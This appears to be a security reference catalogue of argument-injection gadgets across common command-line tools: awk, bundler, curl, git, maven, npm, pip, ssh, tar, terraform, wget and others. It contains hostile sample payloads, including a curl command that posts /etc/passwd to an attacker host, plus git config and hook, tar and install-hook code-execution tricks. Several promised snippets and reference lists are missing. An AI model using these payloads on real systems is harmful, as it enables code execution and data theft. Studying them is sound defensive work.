Argument Injection
awk
system
awk supports the system function, which executes arbitrary commands:
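A typical payload looks like this (id is just a harmless demonstration command):

```shell
awk 'BEGIN { system("id") }'
```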
If spaces cannot be inserted, sprintf can be used to bypass the restriction:
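A sketch of the bypass: %c with the numeric argument 32 produces a space character without one appearing in the payload:

```shell
# sprintf("%c", 32) yields a space, so the command string contains no literal spaces
awk 'BEGIN { cmd = sprintf("cat%c/etc/passwd", 32); system(cmd) }'
```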
References:
bundler
bundler install
bundler install uses gem under the hood, so it is possible to reuse gem's features for exploitation.
Gemfile
Gemfile describes the gem dependencies required to execute associated Ruby code. Since it is a Ruby file, you can write arbitrary code that will be executed when running bundle install.
When bundle install is run, the arbitrary Ruby code will be executed.
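A minimal sketch of such a Gemfile (the payload is a harmless id invocation; the output path is hypothetical):

```ruby
# Gemfile — the backtick expression is evaluated as Ruby when bundler loads the file
`id > /tmp/pwned`

source 'https://rubygems.org'
gem 'rake'
```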
gem dependency
Since bundler uses gem install to install the dependencies specified in Gemfile, you can use extensions to embed arbitrary code.
When bundle install is run, the arbitrary Ruby code will be executed.
References:
git dependency
One of the sources of gems for bundler is a git repository with the gem's source code. Since a git repository contains source code, bundler builds it before installing. Therefore, you can write arbitrary code that will be executed when running bundle install.
You can execute arbitrary code using both the gemspec file and native extensions.
Create a repository on github.com with the following hola.gemspec file:
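A sketch of a malicious gemspec; the top-level backtick expression runs whenever the spec is evaluated (gem name and payload are illustrative):

```ruby
# hola.gemspec — top-level code executes when bundler evaluates the spec
`id > /tmp/pwned`

Gem::Specification.new do |s|
  s.name    = 'hola'
  s.version = '0.0.1'
  s.summary = 'hola'
  s.authors = ['attacker']
end
```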
Add the repository to Gemfile as a git dependency.
When bundle install is run, the arbitrary Ruby code will be executed.
References:
path dependency
You can specify that a gem is located in a particular location on the file system. Relative paths are resolved relative to the directory containing the Gemfile.
Similar to the semantics of the :git option, the :path option requires that the directory in question either contains a .gemspec for the gem, or that you specify an explicit version that bundler should use.
Unlike :git, bundler does not compile native extensions for gems specified as paths. Therefore, you can gain code execution using a .gemspec file with arbitrary code or a pre-built gem with a native extension.
When bundle install is run, the arbitrary Ruby code will be executed.
References:
curl
curl can be used to exfiltrate local files or write arbitrary content to them.
Additionally, the file: scheme can be used to read or copy local files:
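A sketch of both techniques (attacker.example is a placeholder host):

```shell
# Exfiltrate a local file in a POST body to an attacker-controlled server
curl -d @/etc/passwd https://attacker.example/

# Read a local file via the file: scheme
curl file:///etc/passwd

# Copy a local file to another location
curl file:///etc/passwd -o /tmp/passwd-copy
```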
References:
find
exec
The -exec option can be used to execute arbitrary commands:
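For instance (the search path is arbitrary; id is a harmless demonstration command):

```shell
# Run an arbitrary command for each matched file
find /etc -maxdepth 1 -name hosts -exec id \;
```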
References:
execdir
-execdir is similar to -exec, but the specified command is run from the subdirectory containing the matched items. -execdir can be used to execute arbitrary commands:
fprintf
-fprintf can be used to write to local files:
find provides various ways of writing to files; check out the man page for more details.
References:
gem
gem build
A gemspec file is a Ruby file that defines what is in the gem, who made it, and the version of the gem. Since it is a Ruby file, you can write arbitrary code that will be executed when running gem build.
When gem build is run, the arbitrary Ruby code will be executed.
References:
gem install
Extensions
gemspec allows you to define extensions to build when installing a gem. Many gems use extensions to wrap libraries that are written in C with a Ruby wrapper. gem uses extconf.rb to build an extension during installation. Since it is a Ruby file, you can write arbitrary code that will be executed when running gem install.
When gem install is run, the arbitrary Ruby code will be executed.
References:
git
-c/--config-env
-c/--config-env passes a configuration parameter to the command. The value given will override values from configuration files. Check out the Abuse via .git/config section to find parameters that can be abused.
Remember that modern versions of Git support setting any config value via GIT_CONFIG* environment variables.
Abusing git directory
A git directory maintains an internal state, or metadata, relating to a git repository. It is created on a user's machine when:
The user runs git init to initialise an empty local repository
The user runs git clone <repository> to clone an existing repository from a remote location
The structure of a git directory is documented at https://git-scm.com/docs/gitrepository-layout
Note that a git directory is often, but not always, a directory named .git at the root of a repo. There are several variables that can redefine a path:
The GIT_COMMON_DIR environment variable or the commondir file specifies a path from which non-worktree files will be taken, which are normally in $GIT_DIR.
Notice that bare repositories do not have a .git directory at all.
References:
Abuse via .git/config
.git/config
allows for the configuration of options on a per-repo basis. Many of the options allow for the specification of commands that will be executed in various situations, but some of these situations only arise when a user interacts with a git repository in a particular way.
There are at least the following ways to set the options:
On a system-wide basis using /etc/gitconfig file
On a global basis using ~/.config/git/config or ~/.gitconfig files
On a local per-repo basis using .git/config file
On a local per-repo basis using .git/config.worktree file. This is optional and is only searched when extensions.worktreeConfig is present in .git/config
On a local per-repo basis using git -c/--config-env option
On a local per-repo basis using git-clone -c/--config option
core.gitProxy
core.gitProxy gives a command that will be executed when establishing a connection to a remote using the git:// protocol.
core.fsmonitor
The core.fsmonitor option is used as a command which will identify all files that may have changed since the requested date/time.
In other words, many operations provided by git will invoke the command given by core.fsmonitor to quickly limit the operation's scope to known-changed files in the interest of performance.
At least the following git operations invoke the command given by core.fsmonitor:
git status, used to show information about the state of the working tree, including whether any files have uncommitted changes
git add <pathspec>, used to stage changes for committing to the repo
git rm --cached <file>, used to unstage changes
git commit, used to commit staged changes
git checkout <pathspec>, used to check out a file, commit, tag, branch, etc.
For operations that take a filename, core.fsmonitor will fire even if the filename provided does not exist.
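A minimal sketch of a malicious .git/config (payload and output path are illustrative); any of the operations above, e.g. git status run inside the repository, will execute the command:

```ini
[core]
    fsmonitor = "id > /tmp/pwned"
```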
References:
core.hooksPath
core.hooksPath sets a different path to hooks. You can create a post-checkout hook within a repository, set the path to hooks with hooksPath, and execute arbitrary code.
To execute the payload, run git-clone:
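A local, self-contained illustration (all paths are hypothetical): a hooks directory containing an executable post-checkout hook is supplied via -c core.hooksPath, and git runs the hook at the end of the clone:

```shell
# A repository to clone from (stands in for a remote)
git init -q /tmp/src-repo
git -C /tmp/src-repo -c user.email=a@example.com -c user.name=a \
    commit -q --allow-empty -m init

# An attacker-controlled hooks directory with an executable post-checkout hook
mkdir -p /tmp/evil-hooks
printf '#!/bin/sh\nid > /tmp/pwned\n' > /tmp/evil-hooks/post-checkout
chmod +x /tmp/evil-hooks/post-checkout

# core.hooksPath makes git run the attacker's post-checkout after checkout
git clone -q -c core.hooksPath=/tmp/evil-hooks /tmp/src-repo /tmp/dst-repo
```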
References:
core.pager
core.pager specifies a text viewer for use by Git commands (e.g., less). The value is meant to be interpreted by the shell and can be used to execute arbitrary commands.
For example, in the following snippet git-grep has the --open-files-in-pager option, which uses the default pager from core.pager if no value is given in the arguments:
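A sketch of the injection (repo path and payload are hypothetical): since the pager value is passed to the shell, extra commands can be chained in front of a real pager:

```shell
# A throwaway repo with a tracked file so git-grep has something to match
git init -q /tmp/pager-repo
echo hello > /tmp/pager-repo/file.txt
git -C /tmp/pager-repo add file.txt

# -O with no value falls back to core.pager; the value is shell-interpreted,
# so `id` runs before the real pager (cat) receives the matching file names
git -C /tmp/pager-repo -c core.pager='id >&2; cat' grep --open-files-in-pager hello
```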
If the pager value is not directly set by a user, the order of preference is:
The GIT_PAGER environment variable
The core.pager configuration
The PAGER environment variable
The default chosen at compile time (usually less)
So, the following snippet can also be used to execute commands:
core.sshCommand
core.sshCommand gives a command that will be executed when establishing a connection to a remote using the SSH protocol. If this variable is set, git fetch and git push will use the specified command instead of ssh when they need to connect to a remote system.
diff.external
diff.external gives a command that will be used instead of git's internal diff function.
filter.<driver>.clean and filter.<driver>.smudge
filter.<driver>.clean is used to convert the content of a worktree file to a blob upon checkin.
filter.<driver>.smudge is used to convert the content of a blob object to a worktree file upon checkout.
References:
http.proxy and http.<URL>.proxy
http.proxy or http.<URL>.proxy overrides the HTTP proxy. You can use this to get SSRF:
Pay attention to other http.* configs and remote.<name>.proxy; they can help increase the impact.
References:
Abuse via .git/hooks/
Various files within .git/hooks/ are executed upon certain git operations. For example:
pre-commit and post-commit are executed before and after a commit operation respectively
post-checkout is executed after a checkout operation
pre-push is executed before a push operation
On filesystems that differentiate between executable and non-executable files, hooks are only executed if the respective file is executable. Furthermore, hooks only execute given certain user interaction, such as performing a commit.
For instance, you can use bare repositories to deliver custom git hooks and execute arbitrary code:
If the vulnerable code executes the following bash commands against the prepared repository, it will trigger the custom hook execution and result in the arbitrary code being executed:
References:
Abuse via .git/index
You can achieve an arbitrary write primitive using a crafted .git/index file; check out the advisory.
Abuse via .git/HEAD
It is possible to trick Git into loading a configuration from an unintended location by corrupting .git/HEAD. In such cases, Git starts looking for repositories in the current folder, which an attacker can fully control, for example, if the current folder is a working tree with all the files of the cloned remote repository. The exploitation flow may look like this:
References:
git-blame
--output
git-blame has the --output option, which is not documented in the manual and is usually present on other git sub-commands. Executing git blame --output=foo results in interesting behaviour:
Although the command failed, an empty file named foo was created. If a file with the same name already exists, the destination file is truncated. This option provides an arbitrary file truncation primitive. For example, an attacker can use it to corrupt a critical file in the .git folder like .git/HEAD and trick Git into loading a configuration from an unintended location; check out the Abuse via .git/HEAD section.
References:
git-clone
-c/--config
-c/--config sets a configuration variable in the newly-created repository; this takes effect immediately after the repository is initialized, but before the remote history is fetched or any files checked out. Check the Abuse via .git/config section to find variables that can be abused.
ext URLs
git-clone allows shell commands to be specified in ext URLs for remote repositories. For instance, the next example executes the whoami command when trying to connect to a remote repository:
References:
<directory>
git-clone allows specifying a new directory to clone into. Cloning into an existing directory is only allowed if the directory is empty. You can use this to write a repo outside the default folder.
-u/--upload-pack
upload-pack specifies a non-default path for the command run on the other end when the repository to clone from is accessed via ssh. You can execute arbitrary code like this:
References:
git-diff
git-diff against /dev/null
git-diff against /dev/null can be used to read the entire content of a file, even outside the git directory.
References:
--no-index
The --no-index option can be used to turn git-diff into a normal diff against another file in the git repository, which does not have to be tracked.
References:
git-fetch
--upload-pack
The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2.
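A self-contained sketch (paths are hypothetical): when fetching from a local repository, the --upload-pack value is passed to the shell with the repository path appended, so extra commands can be chained in front of the real git upload-pack:

```shell
# A throwaway repo to fetch from
git init -q /tmp/up-repo
git -C /tmp/up-repo -c user.email=a@example.com -c user.name=a \
    commit -q --allow-empty -m init

# `id >&2` runs first; `git upload-pack '.'` then serves the fetch as usual
git -C /tmp/up-repo fetch --upload-pack='id >&2; git upload-pack' .
```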
References:
git-fetch-pack
--exec
Same as --upload-pack. Check out the section below.
--upload-pack
The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2.
git-grep
--no-index
--no-index tells git-grep to search files in the current directory that are not managed by Git. In other words, if the working directory is different from the repository one, --no-index allows you to access files in the working directory.
References:
-O/--open-files-in-pager
-O/--open-files-in-pager opens the matching files in the pager. It can be used to run arbitrary commands:
References:
git-log
--output
--output defines a specific file to output to instead of stdout. You can use this to rewrite arbitrary files.
References:
git-ls-remote
--upload-pack
The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2.
References:
git-pull
--upload-pack
The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2.
References:
git-push
--receive-pack/--exec
receive-pack or exec specifies a path to the git-receive-pack program on the remote end. You can execute arbitrary code like this:
maven
Execution of arbitrary commands or code during mvn <PHASE> is possible through the use of various plugins, such as exec-maven-plugin or groovy-maven-plugin. In order to execute a malicious payload using the groovy-maven-plugin plugin during the phase <PHASE>, you can use the following configuration:
For example, you can execute the plugin during mvn initialize or mvn compile using the following pom.xml file:
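A sketch of such a pom.xml (coordinates and the Groovy payload are illustrative; the plugin version is an assumption):

```xml
<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <groupId>com.example</groupId>
  <artifactId>payload</artifactId>
  <version>1.0</version>
  <build>
    <plugins>
      <plugin>
        <groupId>org.codehaus.gmaven</groupId>
        <artifactId>groovy-maven-plugin</artifactId>
        <version>2.1.1</version>
        <executions>
          <execution>
            <!-- the Groovy source runs during `mvn initialize` -->
            <phase>initialize</phase>
            <goals>
              <goal>execute</goal>
            </goals>
            <configuration>
              <source>
                "id".execute()
              </source>
            </configuration>
          </execution>
        </executions>
      </plugin>
    </plugins>
  </build>
</project>
```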
References:
npm scripts
The scripts property of the package.json file supports a number of built-in scripts and their preset life cycle events, as well as arbitrary scripts. These can all be executed by running npm run-script or npm run for short.
Scripts from dependencies can be run with npm explore <pkg> -- npm run <stage>.
Pre and post commands with matching names will be run for those as well (e.g. premyscript, myscript, postmyscript). To create pre or post scripts for any scripts defined in the scripts section of package.json, simply create another script with a matching name and add pre or post to the beginning of it.
In the following example, npm run compress would execute these scripts as described.
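A sketch of such a package.json scripts section (script bodies are illustrative):

```json
{
  "scripts": {
    "precompress": "echo precompress: runs first",
    "compress": "echo compress: the requested script",
    "postcompress": "echo postcompress: runs last"
  }
}
```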
There are some special life cycle scripts that happen only in certain situations. These scripts happen in addition to the pre<event>, post<event>, and <event> scripts.
prepare (since npm@4.0.0)
Runs any time before the package is packed, i.e. during npm publish and npm pack
Runs BEFORE the package is packed
Runs BEFORE the package is published
Runs on local npm install without any arguments
Runs AFTER prepublish, but BEFORE prepublishOnly
NOTE: If a package being installed through git contains a prepare script, its dependencies and devDependencies will be installed, and the prepare script will be run before the package is packaged and installed
As of npm@7 these scripts run in the background. To see the output, run with --foreground-scripts
prepublish (DEPRECATED)
Does not run during npm publish, but does run during npm ci and npm install
prepublishOnly
Runs BEFORE the package is prepared and packed, ONLY on npm publish
prepack
Runs BEFORE a tarball is packed (on npm pack, npm publish, and when installing git dependencies)
NOTE: npm run pack is NOT the same as npm pack. npm run pack is an arbitrary user-defined script name, whereas npm pack is a CLI-defined command
postpack
Runs AFTER the tarball has been generated but before it is moved to its final destination (if at all, publish does not save the tarball locally)
npm cache add
npm cache add runs the following life cycle scripts:
prepare
npm ci
npm ci runs the following life cycle scripts:
preinstall
install
postinstall
prepublish
preprepare
prepare
postprepare
These all run after the actual installation of modules into node_modules, in order, with no internal actions happening in between.
npm diff
npm diff runs the following life cycle scripts:
prepare
npm install
npm install runs the following life cycle scripts (these also run when you run npm install -g <pkg-name>):
preinstall
install
postinstall
prepublish
preprepare
prepare
postprepare
If there is a binding.gyp file in the root of a package and the install or preinstall scripts were not defined, npm will default the install command to compile using node-gyp via node-gyp rebuild.
npm pack
npm pack runs the following life cycle scripts:
prepack
prepare
postpack
npm publish
npm publish runs the following life cycle scripts:
prepublishOnly
prepack
prepare
postpack
publish
postpublish
prepare will not run during --dry-run
npm rebuild
npm rebuild runs the following life cycle scripts:
preinstall
install
postinstall
prepare
prepare is only run if the current directory is a symlink (e.g. with linked packages)
npm restart
npm restart runs a restart script if one was defined; otherwise, stop and start are both run if present, including their pre and post iterations:
prerestart
restart
postrestart
npm start
npm start runs the following life cycle scripts:
prestart
start
poststart
If there is a server.js file in the root of your package, then npm will default the start command to node server.js. prestart and poststart will still run in this case.
npm stop
npm stop runs the following life cycle scripts:
prestop
stop
poststop
npm test
npm test runs the following life cycle scripts:
pretest
test
posttest
pip
pip install
Extending the setuptools modules allows you to hook almost any pip command. For instance, you can use the install class within the setup.py file to execute arbitrary code during pip install.
When pip install is run, the PostInstallCommand.run method will be invoked.
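A sketch of such a setup.py (package name and payload are illustrative; the file only takes effect when processed by pip):

```python
# setup.py — hypothetical install-time hook
import subprocess

from setuptools import setup
from setuptools.command.install import install


class PostInstallCommand(install):
    """Custom install command that runs arbitrary code during `pip install`."""

    def run(self):
        subprocess.call(["id"])  # arbitrary code executed at install time
        install.run(self)


setup(
    name="example",
    version="0.0.1",
    cmdclass={"install": PostInstallCommand},
)
```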
References:
ssh
authorized_keys and id_*.pub
OpenSSH supports the command option, which specifies the command to be executed whenever a key is used for authentication.
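A sketch of an authorized_keys entry using the command option (the key material is a placeholder; the forced command runs instead of the client's requested command):

```
command="id > /tmp/pwned" ssh-ed25519 <base64-public-key> attacker@example
```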
References:
ssh_config
ssh obtains configuration data from the following sources in the following order:
Command line
User's configuration file ~/.ssh/config
System-wide configuration file /etc/ssh/ssh_config
LocalCommand
LocalCommand specifies a command to execute on the local machine after successfully connecting to the server. The following ssh_config can be used to execute arbitrary commands:
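A minimal sketch of such an ssh_config (the payload is illustrative; PermitLocalCommand must be enabled for LocalCommand to run):

```
Host *
    PermitLocalCommand yes
    LocalCommand id > /tmp/pwned
```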
References:
ssh-keygen
-D
ssh-keygen can load a shared library using the -D option, which leads to arbitrary command execution:
References:
tar
Checkpoints
A checkpoint is a moment of time before writing the nth record to the archive (a write checkpoint), or before reading the nth record from the archive (a read checkpoint). Checkpoints allow periodically executing arbitrary actions.
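A sketch of the classic GNU tar payload (id is a harmless demo command): the exec checkpoint action runs a command at the first checkpoint:

```shell
# --checkpoint=1 fires immediately; exec= runs an arbitrary command (GNU tar)
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=id
```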
--to-command
When the --to-command option is used, instead of creating the files specified, tar invokes the given command and pipes the contents of the files to its standard input. So it can be used to execute arbitrary commands.
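A self-contained sketch (archive and paths are illustrative): the command runs once per extracted file, receiving the file's contents on stdin:

```shell
# Build a sample archive, then run an arbitrary command during extraction (GNU tar)
echo secret > /tmp/data.txt
tar -C /tmp -cf /tmp/demo.tar data.txt

# id runs instead of the file being written to disk
tar -xf /tmp/demo.tar --to-command=id
```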
References:
-I/--use-compress-program
-I/--use-compress-program specifies an external compression program command, and can be abused to execute arbitrary commands:
References:
terraform
terraform-plan
Terraform relies on plugins called "providers" to interact with remote systems. Terraform configurations must declare which providers they require, so that Terraform can install and use them.
You can write a custom provider, publish it to the Terraform Registry and add the provider to the Terraform code.
The provider will be pulled in during terraform init, and when terraform plan is run, the arbitrary code will be executed.
Additionally, Terraform offers the external provider, which provides a way to interface between Terraform and external programs. Therefore, you can use the external data source to run arbitrary code. The following example from the docs executes a Python script during terraform plan:
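A sketch of such a data source, modelled on the provider docs (the script path is hypothetical):

```hcl
data "external" "example" {
  # the listed program is executed during `terraform plan`
  program = ["python3", "${path.module}/example-data-source.py"]
}
```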
References:
wget
--use-askpass
--use-askpass specifies the command to prompt for a user and password. This option can be used to execute arbitrary commands without any arguments and stdout/stderr.
If no command is specified, the command in the environment variable WGET_ASKPASS is used. If WGET_ASKPASS is not set, the command in the environment variable SSH_ASKPASS is used. Additionally, the default command for use-askpass can be set in .wgetrc.
References:
--post-file
--post-file can be used to exfiltrate files in a POST request.
References:
-O/--output-document
-O/--output-document can be used to download a remote file via a GET request and save it to a specific location.
References:
-o/--output-file
-o/--output-file specifies a logfile that will be used to log all messages normally reported to standard error. It can be used to write output to a file.
References:
-i/--input-file
-i/--input-file reads URLs from a local or external file. This key can be used to expose a file content in an error message:
References:
zip
-TT/--unzip-command
-TT/--unzip-command is used to specify a command to test an archive when the -T option is used.
References: